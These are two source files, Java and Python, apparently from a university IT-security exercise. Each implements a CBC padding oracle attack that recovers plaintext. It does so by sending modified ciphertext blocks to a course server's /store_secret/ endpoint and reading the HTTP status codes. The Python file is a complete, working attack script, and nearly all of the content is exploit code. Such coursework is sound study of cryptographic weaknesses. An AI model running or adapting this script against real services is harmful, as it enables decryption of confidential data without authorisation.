File: src/Exercise2/PaddingOracle.java
package Exercise2;

import java.io.IOException;
import java.io.UnsupportedEncodingException;
import java.net.HttpURLConnection;
import java.net.URL;
import java.net.URLDecoder;
import java.net.URLEncoder;
import java.util.Arrays;
import java.util.Base64;

/**
 * Project: IT-Security
 * Created by Kai on 04.06.2017.
 */
public class PaddingOracle {

    private static final int BLOCKSIZE = 16;

    public static void main(String[] args) {
        String urlQuery = "NkivYeRHPWegVIG%2FgiptBChbA8%2BZtjWslmOGB58oathyv1U13KIYy4kVC3Wuq4LcahaFL8lrxTl76VU921AVJw%3D%3D";

        byte[] randomR = new byte[]{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0};
        byte[][] cipherBlocks = splitArray(decode(urlQuery));

        byte[] r = searchR(randomR, cipherBlocks[cipherBlocks.length-1], BLOCKSIZE - 1);

        int paddingLength = findPaddingLength(r, cipherBlocks[cipherBlocks.length-1]);

        byte[] a = new byte[BLOCKSIZE];

        for (int i = a.length - 1; i > (a.length - 1) - paddingLength; i--) {
            a[i] = (byte) (0xff & ((int) r[i]) ^ paddingLength);
        }
        System.out.println(Arrays.toString(a));

        for (int i = r.length - 1; i > (r.length - 1) - paddingLength; i--) {
            r[i] = (byte) (0xff & ((int) a[i]) ^ (paddingLength + 1));
        }
        System.out.println(Arrays.toString(r));

        r = searchR(r, cipherBlocks[cipherBlocks.length-1], BLOCKSIZE -1 -paddingLength);
    }

    private static int sendRequest(String query) {
        final String SERVER = "gruenau5.informatik.hu-berlin.de";
        final String PROTOCOL = "http";
        final int PORT = 8888;

        try {
            URL url = new URL(PROTOCOL, SERVER, PORT, "/store_secret/" + query);
            HttpURLConnection connection = (HttpURLConnection) url.openConnection();
            connection.connect();

            return connection.getResponseCode();

        } catch (IOException e) {
            e.printStackTrace();
            return 1;
        }
    }

    private static byte[][] splitArray(byte[] data) {
        final int length = data.length;
        final byte[][] dest = new byte[(length + BLOCKSIZE - 1) / BLOCKSIZE][];
        int destIndex = 0;
        int stopIndex = 0;

        for (int startIndex = 0; startIndex + BLOCKSIZE <= length; startIndex += BLOCKSIZE) {
            stopIndex += BLOCKSIZE;
            dest[destIndex++] = Arrays.copyOfRange(data, startIndex, stopIndex);
        }

        if (stopIndex < length)
            dest[destIndex] = Arrays.copyOfRange(data, stopIndex, length);

        return dest;
    }

    private static byte[] concatArrays(byte[][] data) {
        byte[] bytes = new byte[data.length * data[0].length];

        int i = 0;
        for (byte[] array : data) {
            for (byte item : array) {
                bytes[i] = item;
                i++;
            }
        }

        return bytes;
    }

    private static byte[] decode(String urlQuery) {
        String decodedURL = "";
        try {
            decodedURL = URLDecoder.decode(urlQuery, "UTF-8");
        } catch (UnsupportedEncodingException e) {
            e.printStackTrace();
        }
        return Base64.getDecoder().decode(decodedURL);
    }

    private static String encode(byte[] byteArray) {
        String base64Encoded = Base64.getEncoder().encodeToString(byteArray);
        try {
            return URLEncoder.encode(base64Encoded, "UTF-8");
        } catch (UnsupportedEncodingException e) {
            e.printStackTrace();
            return "";
        }
    }

    private static byte[] searchR(byte[] r, byte[] y, int position){
        byte[] rMod = r.clone();
        for (int i = 1; i < 256; i++) {
            byte[][] oracleRequest = {rMod, y};
            int response = sendRequest(encode(concatArrays(oracleRequest)));
            System.out.println(response);

            if (response == 200) {
                break;
            } else {
                rMod[position] = (byte) (0xff & ((int) r[position]) ^ i);
                System.out.println(rMod[position]);
            }
        }

        return rMod;
    }

    private static int findPaddingLength(byte[] r, byte[]y){
        int paddingLength = 1;
        for (int i = 0; i < 15; i++) {
            r[i] = (byte) (0xff & ((int) r[r.length - 1] ^ 1));
            System.out.println(Arrays.toString(r));

            byte[][] oracleRequest = {r, y};
            int response = sendRequest(encode(concatArrays(oracleRequest)));
            System.out.println(response);

            if (response == 200) {
                r[i] = (byte) 0;
            } else {
                paddingLength = BLOCKSIZE - i;
                break;
            }
        }
        System.out.println(paddingLength);
        return paddingLength;
    }
}

File: src/Exercise2/PaddingOracle.py
"""Padding Oracle Attack in Python."""

import urllib.parse
import base64
import array
import http.client
import random


def run():
    """Run main code."""
    url_query = ("NkivYeRHPWegVIG%2FgiptBChbA8%2BZtjWslmOGB58oathyv1U13KIYy4kV"
                 "C3Wuq4LcahaFL8lrxTl76VU921AVJw%3D%3D")
    block_size = 16
    cipher_blocks = split_list(decode(url_query), block_size)
    plain_blocks = list(cipher_blocks)

    connection = http.client.HTTPConnection("gruenau4.informatik.hu-berlin.de",
                                            8888)

    for k in reversed(range(1, len(cipher_blocks))):
        print("{} {} {}".format("+++++++++++++++++++++ Block:", k + 1,
                                "+++++++++++++++++++++"))
        c_1 = cipher_blocks[k - 1]
        c_2 = cipher_blocks[k]
        i_2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
        p_2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
        c1_mod = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
        padding_length = 1

        for i in reversed(range(0, block_size)):
            print("{} {} {}".format("--------------------- Position:", i + 1,
                                    "---------------------"))
            for j in range(0, i + 1):
                c1_mod[j] = random.randint(0, 255)
            c1_mod = search_r(c1_mod, c_2, i, connection)
            print("{}: {}".format("C1'", c1_mod))
            i_2[i] = c1_mod[i] ^ padding_length
            print("{}: {}".format("I2'", i_2))
            p_2[i] = c_1[i] ^ i_2[i]
            print("{}: {}".format("P2", p_2))
            padding_length += 1
            for j in reversed(
                    range(block_size - (padding_length - 1), block_size)):
                c1_mod[j] = padding_length ^ i_2[j]

        plain_blocks[k] = p_2

    connection.close()
    plaintext = concat_list(plain_blocks[1:])
    print("{}: {}".format("Plaintext", array.array('B', plaintext).tostring()))


def decode(url_query):
    """Decode base64 url to list of decimal values."""
    decoded_url = urllib.parse.unquote(url_query)
    return list(base64.b64decode(decoded_url))


def encode(ciphertext):
    """Encode list of decimal values to base64 url."""
    as_string = array.array('B', ciphertext).tostring()
    encoded_base64 = base64.b64encode(as_string)
    encoded_url = urllib.parse.quote(encoded_base64, safe='')
    return encoded_url


def split_list(input_list, chunk_size):
    """Split a list in equal sized chunks."""
    return ([
        input_list[i:i + chunk_size]
        for i in range(0, len(input_list), chunk_size)
    ])


def concat_list(lists):
    """Concatenate lists to one list."""
    concat_ls = []
    for item in lists:
        concat_ls += item
    return concat_ls


def search_r(c1_mod, c_2, position, connection):
    """Search a byte where the padding is right."""
    c1_mod[position] = 0
    for i in range(1, 256):
        oracle_request = concat_list([c1_mod, c_2])
        if send_request(encode(oracle_request), connection) == 200:
            break

        else:
            c1_mod[position] = 0 ^ i
    return c1_mod


def send_request(query, connection):
    """Send a request with the ciphertext to the server."""
    connection.request("GET", "/store_secret/?secret=" + query)
    response = connection.getresponse()
    status = response.status
    response.read()
    return status


if __name__ == "__main__":
    run()
